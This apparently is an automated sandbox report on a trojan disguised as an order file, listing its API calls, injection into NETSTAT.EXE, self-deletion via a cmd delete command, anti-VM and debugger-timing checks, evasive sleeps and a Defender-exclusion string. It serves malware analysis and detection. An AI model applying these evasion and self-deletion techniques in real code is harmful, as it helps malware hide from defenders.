Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9770 NtSetInformationFile,		5_2_00FD9770
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9760 NtOpenProcess,		5_2_00FD9760
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD9730 NtQueryVirtualMemory,		5_2_00FD9730
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FDA710 NtOpenProcessToken,		5_2_00FDA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839A50 NtCreateFile,LdrInitializeThunk,		14_2_03839A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038399A0 NtCreateSection,LdrInitializeThunk,		14_2_038399A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839910 NtAdjustPrivilegesToken,LdrInitializeThunk,		14_2_03839910
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839840 NtDelayExecution,LdrInitializeThunk,		14_2_03839840
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839860 NtQuerySystemInformation,LdrInitializeThunk,		14_2_03839860
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839780 NtMapViewOfSection,LdrInitializeThunk,		14_2_03839780
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839FE0 NtCreateMutant,LdrInitializeThunk,		14_2_03839FE0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839710 NtQueryInformationToken,LdrInitializeThunk,		14_2_03839710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038396D0 NtCreateKey,LdrInitializeThunk,		14_2_038396D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038396E0 NtFreeVirtualMemory,LdrInitializeThunk,		14_2_038396E0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839650 NtQueryValueKey,LdrInitializeThunk,		14_2_03839650
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839660 NtAllocateVirtualMemory,LdrInitializeThunk,		14_2_03839660
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038395D0 NtClose,LdrInitializeThunk,		14_2_038395D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839540 NtReadFile,LdrInitializeThunk,		14_2_03839540
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0383A3B0 NtGetContextThread,		14_2_0383A3B0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839B00 NtSetValueKey,		14_2_03839B00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839A80 NtOpenDirectoryObject,		14_2_03839A80
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839A00 NtProtectVirtualMemory,		14_2_03839A00
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839A10 NtQuerySection,		14_2_03839A10
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839A20 NtResumeThread,		14_2_03839A20
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038399D0 NtCreateProcessEx,		14_2_038399D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839950 NtQueueApcThread,		14_2_03839950
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038398A0 NtWriteVirtualMemory,		14_2_038398A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038398F0 NtReadVirtualMemory,		14_2_038398F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839820 NtEnumerateKey,		14_2_03839820
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0383B040 NtSuspendThread,		14_2_0383B040
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038397A0 NtUnmapViewOfSection,		14_2_038397A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0383A710 NtOpenProcessToken,		14_2_0383A710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839730 NtQueryVirtualMemory,		14_2_03839730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839760 NtOpenProcess,		14_2_03839760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0383A770 NtOpenThread,		14_2_0383A770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839770 NtSetInformationFile,		14_2_03839770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839610 NtEnumerateValueKey,		14_2_03839610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839670 NtQueryInformationProcess,		14_2_03839670
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_038395F0 NtQueryInformationFile,		14_2_038395F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839520 NtWaitForSingleObject,		14_2_03839520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0383AD30 NtSetContextThread,		14_2_0383AD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_03839560 NtWriteFile,		14_2_03839560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B285F0 NtCreateFile,		14_2_00B285F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B286A0 NtReadFile,		14_2_00B286A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B287D0 NtAllocateVirtualMemory,		14_2_00B287D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B28720 NtClose,		14_2_00B28720
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B285EB NtCreateFile,		14_2_00B285EB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2869A NtReadFile,		14_2_00B2869A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B28643 NtCreateFile,		14_2_00B28643
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2871A NtClose,		14_2_00B2871A

Sample file is different than original file name gathered from version info

Source: Order No00020212910.exe	Binary or memory string: OriginalFilename vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.289284673.00000000008C2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.290003592.0000000001048000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000000.00000002.292344503.0000000007AC0000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameTaskNode.dll4 vs Order No00020212910.exe
Source: Order No00020212910.exe	Binary or memory string: OriginalFilename vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000000.286450090.0000000000522000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs Order No00020212910.exe
Source: Order No00020212910.exe, 00000005.00000002.359585453.000000000108F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Order No00020212910.exe
Source: Order No00020212910.exe	Binary or memory string: OriginalFilenameLocalDataStoreHold.exe. vs Order No00020212910.exe

PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)

Source: Order No00020212910.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Sample is known by Antivirus

Source: Order No00020212910.exe

Virustotal: Detection: 24%

PE file has an executable .text section and no other executable section

Source: Order No00020212910.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Source: C:\Users\user\Desktop\Order No00020212910.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Users\user\Desktop\Order No00020212910.exe 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process created: C:\Users\user\Desktop\Order No00020212910.exe C:\Users\user\Desktop\Order No00020212910.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process created: C:\Users\user\Desktop\Order No00020212910.exe C:\Users\user\Desktop\Order No00020212910.exe			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order No00020212910.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Creates files inside the user directory

Source: C:\Users\user\Desktop\Order No00020212910.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order No00020212910.exe.log

Jump to behavior

Classification label

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@9/5

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\user\Desktop\Order No00020212910.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Found detection on Joe Sandbox Cloud Basic with higher score

Source: Order No00020212910.exe

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Creates mutexes

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01

Reads the hosts file

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\Order No00020212910.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE file contains a COM descriptor data directory

Source: Order No00020212910.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Order No00020212910.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: netstat.pdbGCTL source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source:	Binary string: netstat.pdb source: Order No00020212910.exe, 00000005.00000002.359158695.0000000000F60000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Order No00020212910.exe, 00000005.00000002.359186565.0000000000F70000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000E.00000002.541418098.00000000038EF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Order No00020212910.exe, NETSTAT.EXE

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_008C9016 push esp; iretd		0_2_008C9017
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_02B81C7C push ebx; iretd		0_2_02B81C7A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_02B81C67 push ebx; iretd		0_2_02B81C7A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 0_2_076CF8E7 push esi; ret		0_2_076CF8F5
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041B832 push eax; ret		5_2_0041B838
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041B83B push eax; ret		5_2_0041B8A2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041B89C push eax; ret		5_2_0041B8A2
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041B399 push ecx; ret		5_2_0041B39F
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041CE1E push 4B5FDABCh; ret		5_2_0041CFA6
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_0041B7E5 push eax; ret		5_2_0041B838
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00529016 push esp; iretd		5_2_00529017
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FED0D1 push ecx; ret		5_2_00FED0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_0384D0D1 push ecx; ret		14_2_0384D0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2B89C push eax; ret		14_2_00B2B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2B832 push eax; ret		14_2_00B2B838
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2B83B push eax; ret		14_2_00B2B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2B399 push ecx; ret		14_2_00B2B39F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2C48D push edi; ret		14_2_00B2C48F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2CE1E push 4B5FDABCh; ret		14_2_00B2CFA6
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 14_2_00B2B7E5 push eax; ret		14_2_00B2B838

Binary may include packed or encrypted code

Source: initial sample

Static PE information: section name: .text entropy: 7.60777212837

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del 'C:\Users\user\Desktop\Order No00020212910.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del 'C:\Users\user\Desktop\Order No00020212910.exe'			Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 0.2.Order No00020212910.exe.2c1e860.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Order No00020212910.exe PID: 7040, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Order No00020212910.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Order No00020212910.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000B18614 second address: 0000000000B1861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000000B189AE second address: 0000000000B189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Order No00020212910.exe TID: 7044	Thread sleep time: -37045s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe TID: 7060	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 6852	Thread sleep time: -45000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6680	Thread sleep time: -34000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Order No00020212910.exe

Code function: 5_2_004088E0 rdtsc

5_2_004088E0

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Order No00020212910.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Queries a list of all running processes

Source: C:\Users\user\Desktop\Order No00020212910.exe

Process information queried: ProcessInformation

Jump to behavior

Contains medium sleeps (>= 30s)

Source: C:\Users\user\Desktop\Order No00020212910.exe	Thread delayed: delay time: 37045			Jump to behavior
Source: C:\Users\user\Desktop\Order No00020212910.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000A.00000000.297928991.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000A.00000000.294369415.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.294369415.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 0000000A.00000000.314286667.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: Order No00020212910.exe, 00000000.00000002.290303747.0000000002BD1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Order No00020212910.exe

Code function: 5_2_004088E0 rdtsc

5_2_004088E0

Enables debug privileges

Source: C:\Users\user\Desktop\Order No00020212910.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F958EC mov eax, dword ptr fs:[00000030h]		5_2_00F958EC
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h]		5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h]		5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F940E1 mov eax, dword ptr fs:[00000030h]		5_2_00F940E1
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB8E4 mov eax, dword ptr fs:[00000030h]		5_2_00FBB8E4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBB8E4 mov eax, dword ptr fs:[00000030h]		5_2_00FBB8E4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF0BF mov ecx, dword ptr fs:[00000030h]		5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF0BF mov eax, dword ptr fs:[00000030h]		5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FCF0BF mov eax, dword ptr fs:[00000030h]		5_2_00FCF0BF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FD90AF mov eax, dword ptr fs:[00000030h]		5_2_00FD90AF
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC20A0 mov eax, dword ptr fs:[00000030h]		5_2_00FC20A0
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00F99080 mov eax, dword ptr fs:[00000030h]		5_2_00F99080
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h]		5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h]		5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h]		5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010549A4 mov eax, dword ptr fs:[00000030h]		5_2_010549A4
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010169A6 mov eax, dword ptr fs:[00000030h]		5_2_010169A6
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB0050 mov eax, dword ptr fs:[00000030h]		5_2_00FB0050
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FB0050 mov eax, dword ptr fs:[00000030h]		5_2_00FB0050
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h]		5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h]		5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h]		5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_010151BE mov eax, dword ptr fs:[00000030h]		5_2_010151BE
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h]		5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h]		5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h]		5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FBA830 mov eax, dword ptr fs:[00000030h]		5_2_00FBA830
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h]		5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h]		5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h]		5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FAB02A mov eax, dword ptr fs:[00000030h]		5_2_00FAB02A
Source: C:\Users\user\Desktop\Order No00020212910.exe	Code function: 5_2_00FC002D mov eax, dword ptr fs:[00000030h]		5_2_00FC002D
